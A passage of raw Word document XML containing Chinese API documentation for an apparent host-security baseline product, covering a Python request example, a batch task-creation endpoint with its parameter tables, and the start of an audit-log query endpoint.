        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import requests</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def app_auth_list():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/baseline/auth/list/linux?comId=1e46b07f93a6410172c4&amp;uuid=1e46b07f93a6410172c4&amp;authToken=557cc4d3cc45414d9438173a3cd1296c&amp;osType=1&amp;appName=WebLogic" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    querystring = {"comId":"1e46b07f93a6410172c4","uuid":"1e46b07f93a6410172c4","authToken":"557cc4d3cc45414d9438173a3cd1296c","osType":"1","appName":"WebLogic"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = requests.request("GET", url, params=querystring)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print(response.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAE30BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="批量新建任务"/>
      <w:bookmarkEnd w:id="191"/>
      <w:r>
        <w:t>批量新建任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4190C290" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6984EA8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/baseline/job/{multilinux，multiwin}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B26EDB4"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423"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="4777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="662DE21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F79DB00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50D342DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53B87358" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5F4166EE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09486900" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39F0DF25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68AD667B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务名，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7DD419E7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B16A807" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F390023" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28C738A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必填，范围类型 0-主机 1-业务组 2-全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B783E51" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CF2B392" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15DFBD3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="436B6E6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kind=0时必填，所选主机列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="53123DA4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EFB606D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CAEF583" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F0D7A1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kind=1时必填，所选业务组列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="309DB49D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DD3A2A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ruleIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B12E377" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EAD1223" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必填，基线规则id列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6397E68E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D26B417" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40D7B404" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E21D93E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必填，是否定时任务 true-定时任务 false-普通任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="27282515" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5574B6EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="799A2D55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ACA1F86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnabled=true必填，cron任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="62E59806" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A236275" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A84F573" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69C91989" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D0616AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA05499" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       "name": "test_001",  //必填，任务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "kind": 1,  //必填，范围类型 0-主机 1-业务组 2-全部</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "values": ["407c1dd87b1d7771"],  //kind=0时必填，所选主机列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "groups": [1, 3, 446],  //kind=1时必填，所选业务组列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "ruleIds": ["1b8094cf2cacf0e42acf","1b8094cf2cacf0e42abc"]  //必填，基线规则id列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "cronEnabled": false,  //必填，是否定时任务 true-定时任务 false-普通任务</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "cron": "0 17 * * *",  //cronEnabled=true必填，cron任务表达式</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "description": "xxx"  //任务描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA2714" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1A1EA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "status":"success",//任务创建状态</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "ids": ["xxxx"] //成功创建的任务specId列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "failedRuleIds": ["xxxx"] //创建失败的规则列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B15E3B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常情景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CD225F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>ruleIds为空, 会抛出相应的异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC4FE8"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458"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="3623"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6583F77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E82565D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79381AE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="786C158F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="185FD637" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12B9C5C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BE567EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AD0692E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务创建状态,全部创建失败时才算失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F751021" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FA9C0EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E5AAF0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17FA1144" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务specId列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68C7F008" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78F8A531" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>failedRuleIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75E63585" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BA01EBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建失败的规则列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="595045A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="系统审计日志查询"/>
      <w:bookmarkEnd w:id="177"/>
      <w:bookmarkEnd w:id="192"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>系统审计日志查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778D4DAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询系统的审计日志信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E97AD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5219EB76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/system/audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476ADC8B"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313"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="2578"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3EE0B8CB"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99BA6B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1356F194" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="097E785C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53DC20BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="479B6AFB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E1E1E2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>eventName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7478D420" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A6ED4C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68E5813A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作名称（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2A48FAE1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30640204" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>userName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07AE1D56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DA82377" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7665610C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作的帐号名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CCD4468" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C62C3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/system/audit?size=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429BED90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F57936" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "eventId": "5bf4db32c0591c4ab22b6307",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "eventType": "新建",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "eventName": "Linux-资产清点-主机发现",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "eventSource": "Console",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "osType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "resourceFunction": "资产清点",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "resourceSubFunction": "主机资产",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "requestIp": "127.0.0.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "location": "本机地址",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "requestId": "362a33c0fc5a4d858ed22e1800ade08d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "requestParam": "{\n  \"comid\": \"59080851823593e1a80b\",\n  \"uuid\": \"59080851823593e1a80b\",\n    \"page\": 1,\n    \"size\": 50,\n    \"orders\": [\n        {\n            \"field\": \"agentStatus\",\n            \"ascend\": true\n        }\n    ],\n    \"filters\": [\n        \"platform\",\n        \"group\"\n    ],\n    \"charts\": [\n        \"agentStatus\",\n        \"platform\",\n        \"group\"\n    ]\n}",</w:t>
      </w:r>
      <w:r>
        <w:br/>
